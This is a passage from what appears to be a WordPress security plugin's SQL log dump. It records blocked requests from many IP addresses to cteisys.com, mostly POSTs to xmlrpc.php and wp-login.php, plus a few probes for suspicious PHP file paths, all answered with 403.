Safari\\/537.36\"}','3IlFedgKaGLrM7hzySoPTHk5',0,1664323231.8822,542,'','POST',403,0,515,0,1,'',0),('82.165.86.198',1386567366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','LUFOwV8SebhpkrElDGvBn5IN',0,1664323233.1468,552,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','gZF8VesbdBwGPzuLrK7oMUYO',0,1664323236.2631,484,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','1neqOWRw9J5aVYElNhAtzP2g',0,1664323255.7190,1415,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','QVzgEj4kn2MoZw9YP8BdpCD6',0,1664323289.4856,525,'','POST',403,0,600,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','FArjQdwM5OBXxJZSTyUs8G9u',0,1664323314.2081,1516,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','SoaxwNWuhA7ZqzUvDktmM9yB',0,1664324433.2449,17477,'','POST',403,0,600,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','jKbD52ySOA3fYoRlmT104vs8',0,1664324455.8328,1600,'','POST',403,0,515,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','4FIarymQHxOEN5gBcfl2vuwL',0,1664324457.8238,472,'','POST',403,0,600,0,1,'',0),('101.200.198.206',1707656910,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','2SwX1UWqCVa9YHyARPemoijn',0,1664324460.3836,503,'','POST',403,0,515,0,1,'',0),('103.163.161.146',1738776978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','xXT6R1VrPFJlcq38Md2ZWCSE',0,1664324470.7916,595,'','POST',403,0,515,0,1,'',0),('185.94.98.209',3109970641,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','sMgEtjU5RZl8Npf7P1JO0Sxv',0,1664324478.8289,1574,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','oPe305OX2bhSlsYuQHRiBEzf',0,1664324479.2100,1497,'','POST',403,0,515,0,1,'',0),('103.163.161.146',1738776978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','3Y5V6rTUnfIvX2asMg4iElu8',0,1664324480.0962,949,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','5tGcz2EIvVWmbFSUYZquBHCk',0,1664324489.0119,4910,'','POST',403,0,515,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','s7C6q1dtB3DlnE9cMAYvL4Zx',0,1664325573.7904,17488,'','POST',403,0,600,0,1,'',0),('192.99.201.91',3227765083,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','glipvBjRVAQDcChJetM4rfxm',0,1664325598.3674,460,'','POST',403,0,600,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','fxURGwnAO3oSh9THvL8MuJck',0,1664326473.9598,2514,'','POST',403,0,515,0,1,'',0),('61.19.125.142',1024687502,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','H7nD51tV2MNJmuf4weRxA6db',0,1664326478.8103,544,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','9moqA4nBthQki6eGD3gLc0Yl',0,1664326480.8912,517,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Z5Rxj9WtSkqLV3gcrdNQ6ezM',0,1664326500.4061,1082,'','POST',403,0,515,0,1,'',0),('185.58.73.254',3107604990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','4UhWTsDoOq2SdAyiY175Batl',0,1664326500.2128,1955,'','POST',403,0,515,0,1,'',0),('217.116.205.56',3648310584,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','Zi85f0BXaQ7n3IlEjRP1s4uH',0,1664326514.1115,477,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','lFpzUdTJG2ogqMVaECwPctnA',0,1664326516.1160,567,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','DmkMTVyn5LYtSgzHG1chuNlv',0,1664326713.5584,1395,'','POST',403,0,600,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','XdOpoQnDUZBVGAkJNmalj47u',0,1664326737.2043,1225,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','ypWG935e7zaAKIPTOsnlJkb0',0,1664327778.8935,12275,'','POST',403,0,700,0,1,'',0),('137.184.193.51',2310586675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','IFMAwyJPm2Z6zhqGfVu4iCdW',0,1664329574.1009,2340,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','2agKsFv80t3pVbWQURDqwCmO',0,1664329583.4907,515,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','xFlY6sKHkv2cturz8odqCJ0U',0,1664329587.3319,518,'','POST',403,0,515,0,1,'',0),('45.143.81.51',764367155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','MPwdnIp7Vef1cuhliAqrWDx8',0,1664329606.3092,1168,'','POST',403,0,515,0,1,'',0),('185.107.113.101',3110826341,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','AGhQXIsg1w8vFebirW9RdcEt',0,1664329617.1795,549,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tH1w6nc3JPgUID8LO2Zf5KBX',0,1664330090.7963,1460,'','POST',403,0,515,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','U2sd64RDQwCZJgyWGuIbLzEv',0,1664330158.3866,1156,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','PiFGm3Dg0kj6YRe71QHTy4Xa',0,1664330183.8728,454,'','POST',403,0,600,0,1,'',0),('72.167.77.106',1218923882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','5sRE63N2cFT1mQBa8ZxJGblK',0,1664330964.9117,483,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dpbBLUs4mj3fCRhEzYMrwKQX',0,1664330967.3305,468,'','POST',403,0,515,0,1,'',0),('47.241.3.166',804324262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','iVNAL2Hvrtp0f1nmSlJkRIZx',0,1664330971.9202,545,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gRcYO8zlAK9Dm6GZhxd7taLB',0,1664330980.7408,863,'','POST',403,0,515,0,1,'',0),('208.109.214.179',3496859315,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','8hOcH6Xluprjyf5Low3VmY2a',0,1664330981.3022,711,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','wipoGFQSdvJ95WeTXEh3Ktbx',0,1664330984.4790,515,'','POST',403,0,515,0,1,'',0),('101.200.198.206',1707656910,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','ZqyjgQRrOvo9DVchi15eJGMP',0,1664330985.3206,591,'','POST',403,0,515,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7XUAIjQZcBl52K1zTpxHDnqe',0,1664331160.4737,304,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','apiYDA256USHucZyLdqCoxkE',0,1664331166.8464,365,'','GET',403,0,700,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','pOh4KtSf95BVFZvXkgsrD0GR',0,1664331327.7753,4681,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','oGRPgbm7JQT6Bryakw8iENZu',0,1664331355.5367,1397,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','CgzEw0TarUbQlLOIhZGp2Fu3',0,1664332488.6942,17893,'','POST',403,0,600,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','UI0PcJAvnwlsNdL342DHgxRm',0,1664332516.5775,539,'','POST',403,0,600,0,1,'',0),('185.58.73.254',3107604990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','clxBzJhLOas7y4mb0GE9oNv1',0,1664333010.5981,5733,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0lAKuD1QJZXNyBT3LHGsxSka',0,1664332998.5893,17804,'','POST',403,0,515,0,1,'',0),('173.212.223.238',2916409326,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','k3Ia0HDvigoBbEf4mzYV8ZLx',0,1664333009.4381,6968,'','POST',403,0,515,0,1,'',0),('217.146.69.53',3650241845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','d0nDLuTAHamrp9eX7YbtoWh3',0,1664333026.0717,1619,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','Q0o9cSbgeyVKOxhq1ivNGp6M',0,1664333026.9977,1050,'','POST',403,0,515,0,1,'',0),('128.199.54.204',2160539340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','zkEdnf8wutbCAIgLmvQ2NoPj',0,1664333036.1611,624,'','POST',403,0,515,0,1,'',0),('134.209.184.76',2261891148,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Hhg5Wi2FT7C3B4sMZpNnKrUv',0,1664333649.6493,14704,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','urI5oBGRd2Dg63p1NZSsjhz0',0,1664333913.4793,12013,'','POST',403,0,700,0,1,'',0),('69.163.152.108',1168349292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','GyvDnimcLK6g2Nh0uYXtfUHr',0,1664334814.8273,17715,'','POST',403,0,600,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','rd39XBQ5pasKxCRh6mwTEfgv',0,1664334844.2792,667,'','POST',403,0,600,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','H2OYJaTjlVo9knewu7hZd4C5',0,1664335707.9893,15272,'','POST',403,0,515,0,1,'',0),('177.55.111.11',2973200139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','rlNxpzPv9mjtUf4g1wEYbySG',0,1664335705.3243,17939,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','JI8uQtMOiz4shgayDnrjwboB',0,1664335708.4247,14880,'','POST',403,0,515,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','nCGd6hbe2pwgB4lzN708VEoi',0,1664335994.9360,20157,'','POST',403,0,600,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','eZYsrIkpxcm7oKFdU2qJzTbG',0,1664336002.7282,12476,'','POST',403,0,600,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','af3KBoT1cgQn0yHqmC8ROk2p',0,1664336280.9126,13533,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','Ctrlm5w6eixofYBzPQ8yZRp2',0,1664336276.6853,17800,'','POST',403,0,515,0,1,'',0),('89.46.107.98',1496214370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','D87gjLyXn1lFTuxRpZmI3sOk',0,1664336297.5773,920,'','POST',403,0,515,0,1,'',0),('51.77.159.184',860725176,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','PRriHmwCtVjXxTkM4WNQZzDo',0,1664336302.2264,580,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','YEJVAGbspyk7TSOlj0QaBuZP',0,1664336303.9345,518,'','POST',403,0,515,0,1,'',0),('124.222.194.56',2094973496,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','qyWSBXxFiMtO4zYRdlNn7eph',0,1664336307.4235,518,'','POST',403,0,515,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','06uNJZzln9DcyhskdjprABaT',0,1664336323.3372,15653,'','POST',403,0,515,0,1,'',0),('64.71.32.81',1078403153,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','s8FDPCnV4AagrNlixHj5Q3qh',0,1664336321.4049,17626,'','POST',403,0,515,0,1,'',0),('101.200.198.206',1707656910,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','Rhg6JucpASkiXlPyHq2F4Vot',0,1664336388.1026,17084,'','POST',403,0,515,0,1,'',0),('162.212.56.30',2731816990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','Fv6InYK1PMumEB98piDz2Alr',0,1664336385.3566,19960,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','3rBysn1tgb8keM7vjXL4Eacu',0,1664336411.7431,9148,'','POST',403,0,515,0,1,'',0),('72.167.77.106',1218923882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','lSEAbtnuqoxh6R0cPdWjTKMi',0,1664336405.3913,15519,'','POST',403,0,515,0,1,'',0),('211.13.204.1',3540896769,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','IKs1b03Q46CoWhqti8zf9cEJ',0,1664336411.2432,9669,'','POST',403,0,515,0,1,'',0),('54.37.156.2',908434434,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','l458FcMHjI3vyrOoVq6AQGa9',0,1664336426.3187,649,'','POST',403,0,515,0,1,'',0),('92.204.239.12',1556934412,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','jMmFBDK10pi4foVJLlC5dGyx',0,1664336431.8964,932,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','E8sf7XuyTImdwx0SL3ViCUzn',0,1664336432.3938,824,'','POST',403,0,515,0,1,'',0),('77.68.64.29',1296318493,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','S0gfvPLJmiDNxcOBdp1EntuC',0,1664336435.8441,532,'','POST',403,0,515,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','NylQvdwWLYKUH843P0tITSO7',0,1664337148.2219,1479,'','POST',403,0,600,0,1,'',0),('120.27.240.230',2015097062,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','08BflceNEKqzo9kyFY4vZAnH',0,1664337174.7934,481,'','POST',403,0,600,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','r1hIsqUyCSbYJfQK2Wi90HZw',0,1664339939.1144,11681,'','POST',403,0,515,0,1,'',0),('13.64.60.246',222313718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','HOiWS4ZICrw3z9uBjNbmclLq',0,1664339940.6616,10244,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','pgS9NsetfGbmXqHRAM7KDk0j',0,1664339944.0531,6937,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 